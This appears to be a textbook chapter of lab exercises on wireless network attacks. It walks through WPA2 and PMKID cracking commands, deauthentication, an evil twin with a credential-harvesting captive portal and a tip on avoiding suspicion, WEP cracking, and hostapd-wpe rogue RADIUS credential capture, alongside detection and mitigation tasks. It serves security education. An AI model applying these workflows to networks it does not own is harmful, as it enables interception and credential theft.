Chapter 25 Exercises: Wireless Network Attacks

Authorized Testing Only: All wireless exercises must be performed against your own equipment in a controlled lab environment. Never capture, inject, or interfere with wireless networks you do not own. Unauthorized wireless interception is a criminal offense in most jurisdictions.

Exercise 1: Monitor Mode Configuration

Configure a compatible wireless adapter for monitor mode using both the airmon-ng method and the manual iw method. Verify monitor mode is active using iwconfig and iw dev. Document any differences between the methods and troubleshoot common issues (such as interfering processes).

Difficulty: Beginner Objectives: Master the foundational skill of enabling monitor mode for wireless security testing.

Exercise 2: Passive Wireless Reconnaissance

Using your monitor mode adapter and airodump-ng, perform passive reconnaissance of your lab environment. Identify all visible networks and document: SSID, BSSID, channel, encryption type, cipher, authentication method, signal strength, and connected clients. Create a structured report of your findings.

Difficulty: Beginner Objectives: Practice passive wireless reconnaissance and network documentation.

Exercise 3: WPA2 Handshake Capture and Cracking

Set up a dedicated WPA2-PSK access point with a known weak password (select one from the rockyou wordlist, such as "Summer2024!"). Perform the complete cracking workflow:

1. Target identification: Use airodump-ng to identify the target AP's BSSID, channel, and connected clients
2. Focused capture: Lock airodump-ng to the target channel and BSSID, outputting to a capture file
3. Client deauthentication: Use aireplay-ng to send targeted deauthentication frames to force a client to reconnect
4. Handshake verification: Confirm the four-way handshake was captured (look for the "WPA handshake: [BSSID]" message in airodump-ng)
5. CPU cracking: Crack the handshake using aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
6. GPU cracking: Convert the capture to hashcat format using hcxpcapngtool and crack with hashcat -m 22000 -a 0 hash.hc22000 rockyou.txt
7. Performance comparison: Record the cracking speed (keys/second) for both tools and calculate how long it would take to exhaust the full rockyou wordlist with each

Difficulty: Intermediate Objectives: Understand the complete WPA2 handshake capture and cracking workflow. Expected Outcome: You should observe that GPU-based cracking with hashcat is orders of magnitude faster than CPU-based cracking with aircrack-ng, demonstrating why strong, long passphrases are essential for WPA2-PSK security.

Exercise 4: PMKID Attack Practice

Against your lab access point, attempt to capture the PMKID using hcxdumptool. Convert the capture to hashcat format using hcxpcapngtool and crack it. Compare this method with the handshake capture approach in terms of required conditions, speed, and stealth.

Difficulty: Intermediate Objectives: Practice the PMKID attack technique and understand its advantages.

Exercise 5: Custom Wordlist Generation

Create a targeted wordlist for cracking a Wi-Fi password. Use tools such as crunch, CeWL, and John the Ripper rules to generate passwords based on common patterns: organization name + year, seasonal passwords, keyboard patterns, and common substitutions. Test your wordlist against a lab AP configured with a password following one of these patterns.

Difficulty: Intermediate Objectives: Develop skills in creating effective custom wordlists for wireless cracking.

Exercise 6: Evil Twin Attack Lab

Set up a complete evil twin attack against your own open test network:

1. Configure the rogue AP: Use hostapd to create an AP with the same SSID as your test network. Configure it on a different channel initially, then on the same channel
2. Set up DHCP and DNS: Use dnsmasq to provide DHCP addresses to connecting clients and redirect DNS queries to your captive portal
3. Create a captive portal: Build a simple web page mimicking a hotel or coffee shop login page. Use Python's http.server or Flask to serve it. The portal should collect credentials and redirect to a "connected" page
4. Force client migration: Use deauthentication frames against your test network to push clients toward the evil twin
5. Capture and analyze: Connect a test device (phone or laptop) to the evil twin and observe the traffic flow. Examine what data is transmitted in cleartext
6. Detection analysis: Identify the specific indicators a WIDS would use to detect this attack: duplicate SSIDs with different BSSIDs, unusual channel usage, unmanaged MAC addresses

Difficulty: Intermediate Objectives: Understand evil twin attack mechanics and detection methods. Important: Configure iptables/nftables to enable NAT forwarding so that clients connecting to the evil twin still have internet access through your test machine. This is necessary to prevent suspicion in a real assessment scenario.

Exercise 7: Wireless Packet Analysis with Wireshark

Capture wireless traffic (in monitor mode) and analyze it in Wireshark. Identify and examine: beacon frames, probe requests/responses, authentication frames, association frames, deauthentication frames, and the four-way handshake. Create annotated screenshots showing each frame type and its key fields.

Difficulty: Intermediate Objectives: Develop deep understanding of 802.11 frame types through packet analysis.

Exercise 8: Hashcat Rule Development

Create custom hashcat rules optimized for Wi-Fi password cracking. Develop rules that implement common password patterns: capitalize first letter + append digits, leet speak substitutions, append special characters, and prepend common words. Test your rules against a lab AP with a moderately complex password. Measure the performance impact of different rule sets.

Difficulty: Advanced Objectives: Master advanced password cracking techniques for wireless assessments.

Exercise 9: BLE Device Enumeration

Using a Bluetooth-capable adapter, perform a comprehensive BLE security assessment:

1. Discovery: Use hcitool lescan or bluetoothctl to discover BLE devices in range. Record the MAC address, device name, and advertised services for each device
2. Service enumeration: For a target device (use a device you own, such as a fitness tracker, smart light, or BLE-enabled Arduino), use gatttool or nRF Connect (mobile app) to enumerate all GATT services and characteristics
3. Read characteristics: Attempt to read all readable characteristics. Identify what data is exposed (device name, battery level, sensor data, configuration)
4. Write test: Identify writable characteristics and test whether they require authentication. On your own devices, attempt to modify configuration values
5. Traffic capture: If you have a BLE sniffer (such as an Ubertooth or nRF52840 dongle), capture BLE traffic between the device and its companion app. Analyze the traffic for plaintext data, static keys, or replay-vulnerable commands
6. Security assessment report: For each finding, rate the severity and recommend mitigations

Difficulty: Intermediate Objectives: Gain practical experience with BLE security assessment. Equipment Needed: A Linux system with a Bluetooth adapter (most built-in adapters work for basic enumeration), a target BLE device you own, and optionally a BLE sniffer for traffic capture.

Exercise 10: Wireless IDS Evaluation

Install and configure Kismet as a wireless IDS in your lab. Generate various wireless attacks (deauthentication floods, rogue AP, probe request floods) and evaluate Kismet's detection capabilities. Document which attacks are detected, the alert details, and any false positive/negative observations.

Difficulty: Intermediate Objectives: Understand wireless intrusion detection capabilities and limitations.

Exercise 11: WEP Cracking Exercise

Configure an old router (or a virtual AP that supports WEP) with WEP encryption. Perform a complete WEP cracking attack using the aircrack-ng suite: monitor, capture, inject ARP requests, and crack the key. Measure how many IVs are needed and how long the process takes. Document why WEP is fundamentally broken.

Difficulty: Beginner Objectives: Understand the historical context of WEP vulnerabilities through practical demonstration.

Exercise 12: Wireless Security Audit Checklist

Develop a comprehensive wireless security audit checklist suitable for a professional assessment. Include checks for: encryption standards, authentication methods, rogue AP detection, signal leakage, guest network isolation, WIDS deployment, client configuration, and physical AP security. Apply your checklist to your own wireless environment.

Difficulty: Intermediate Objectives: Develop professional wireless security assessment methodology.

Exercise 13: Deauthentication Attack Analysis

Perform a controlled deauthentication attack against your lab network using aireplay-ng. Simultaneously, capture the deauth frames with Wireshark on a monitoring interface. Analyze the captured frames to understand the attack mechanism. Then, configure 802.11w Protected Management Frames on your AP and attempt the attack again. Document the difference.

Difficulty: Intermediate Objectives: Understand deauthentication attacks and the protection provided by 802.11w/WPA3.

Exercise 14: Wireless Network Heatmap

Using a wireless analysis tool and a laptop, conduct a basic wireless site survey of your lab space. Map signal strength at various locations and create a simple coverage heatmap. Identify areas where the signal extends beyond the intended coverage area (signal leakage) and recommend physical security mitigations.

Difficulty: Beginner Objectives: Understand wireless signal propagation and physical security considerations.

Exercise 15: WiFi Security Protocol Comparison Report

Write a detailed technical comparison of WEP, WPA-TKIP, WPA2-CCMP, and WPA3-SAE. For each protocol, document: the encryption algorithm, key management, authentication mechanism, known vulnerabilities, attack difficulty, and current recommendation status. Include a decision matrix for organizations choosing wireless security protocols.

Difficulty: Intermediate Objectives: Develop comprehensive understanding of wireless security protocol evolution.

Exercise 16: Bettercap Wireless Module Exploration

Install Bettercap and explore its wireless modules in a lab environment. Use it to perform wireless reconnaissance, client probing, and deauthentication testing. Compare Bettercap's capabilities with the aircrack-ng suite and document the advantages and limitations of each toolset.

Difficulty: Intermediate Objectives: Gain familiarity with alternative wireless security testing tools.

Exercise 17: Wireless Penetration Test Report

Conduct a complete wireless security assessment of your lab environment and write a professional penetration test report. Include: scope definition, methodology, findings with severity ratings, evidence, risk analysis, and prioritized remediation recommendations. Follow industry-standard report formatting.

Difficulty: Advanced Objectives: Develop end-to-end wireless assessment and reporting skills.

Exercise 18: Enterprise Wireless Attack Simulation

Set up a WPA2-Enterprise lab environment and practice attacking it:

Lab Setup: - Install FreeRADIUS on a Linux VM and configure it with EAP-PEAP/MSCHAPv2 authentication - Configure a test AP to use WPA2-Enterprise with the RADIUS server - Create test user accounts in FreeRADIUS

Attack Sequence: 1. Credential capture with hostapd-wpe: Deploy a rogue AP using hostapd-wpe (Wireless Pwnage Edition) configured with the same SSID as the enterprise network. Use a self-signed certificate for the RADIUS server 2. Client connection: Connect a test client that does NOT have server certificate validation configured. Observe the MSCHAP challenge/response captured by hostapd-wpe 3. Credential cracking: Use asleap or hashcat (mode 5500) to crack the captured MSCHAP challenge/response 4. Certificate validation test: Now configure the test client with proper server certificate validation (pin the legitimate RADIUS server's certificate). Attempt the same attack and observe that the client rejects the rogue certificate 5. Documentation: Write a findings report explaining the vulnerability, the difference certificate validation makes, and how to deploy proper certificate validation through MDM or Group Policy across an organization

Difficulty: Advanced Objectives: Understand enterprise wireless attack techniques and the importance of certificate validation. Key Takeaway: This exercise demonstrates that WPA2-Enterprise is only as secure as the client configuration. Without certificate pinning, enterprise wireless is vulnerable to credential theft through rogue RADIUS servers.